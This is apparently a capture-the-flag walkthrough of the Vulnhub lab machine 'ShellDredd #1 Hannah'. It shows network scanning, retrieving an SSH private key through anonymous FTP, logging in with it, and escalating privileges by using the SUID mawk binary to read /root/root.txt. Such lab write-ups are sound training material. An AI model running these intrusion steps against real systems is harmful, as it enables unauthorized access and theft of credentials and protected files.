Vulnhub: Shelldredd #1 Hannah Walkthrough

Hey there my fellow hackers, here’s a write-up of the box from vulnhub Hannah. You can download this box from link https://www.vulnhub.com/entry/onsystem-shelldredd-1-hannah,545/.

OnSystem: ShellDredd #1 Hannah

So let’s start the Pentest.

Scanning Network :

using netdiscover command, we’ll find the ip address of the machine with its corresponding MAC address.

sudo netdiscover -r 10.0.2.0/24

finding IP address of machine using Netdiscover

Now, we’ll do port scan on this IP address to find the open ports, services running and vulnerabilities on this machine and save the output in file named nmap.txt.

nmap -A -T4 -p- 10.0.2.47 > nmap.txt

nmap scan result

As we can see there are only 2 ports open, i.e. 21(FTP) and next is 22(SSH).

Enumeration :

We can login into FTP server via Anonymous login, so let’s login into it and enumerate further.

ftp 10.0.2.47

get connected with ftp

Okay, so we got in. Now let’s enumerate a bit. Using ls command, we can list the content of the working directory but we won’t get anything. Now using ls -la command to list hidden files and directories and everything, we get

ls -la will list all hidden files/directory

We’ll move into hidden directory ( .hannah ) and listing content using ls command.

using get command to download SSH key

So we can see that id_rsa file (SSH Key) was found. So we’ll download this file on our local system using get command and we’ll take our exit.

Pre-Exploitation :

Now, we have found the SSH Key and downloaded it in our local system, the major concern is that SSH key may have improper permissions. SSH keys require specific set of permissions. The key must have read and write permissions of either User or Owner. That means we need to add 600 permissions.

chmod 600 id_rsa

changing permissions for proper authentication

After setting specific permissions, we’ll now login using ssh key into machine and the port on which SSH service running is 61000.

ssh -i id_rsa hannah@10.0.2.47 -p 61000

connected as hannah user in SSH

and here we’ll get the user’s access.

doing ls will list the content and there we’ll found our user flag and doing cat will read the text inside user flag.

we got the USER Flag

Post-Exploitation :

Now we can check if we can run any binaries as sudo,

sudo -l

checking for binaries

We can also enumerate all binaries having SUID permissions with help of find command,

find / -perm -u=s -type f 2>/dev/null

finding binaries which have special permissions

We find that a binary called mawk has SUID permissions. Let’s exploit it.

#Priv-Esc : /usr/bin/mawk stands out as the most possible way for privilege escalation. As SUID bit is set on this binary, we can use mawk to do privileged read of /root/root.txt file.

First we’ll set the environment variable of the file we want to read (/root/root.txt):

ROOT_FLAG=/root/root.txt

set environment variable

We can then run mawk command and pass in above variable,

mawk ‘//’ “$ROOT_FLAG”

getting ROOT Flag

We’ve captured the ROOT flag!!.

I hope you found this useful. You can also comment where I lack or what I forgot. Thanks :)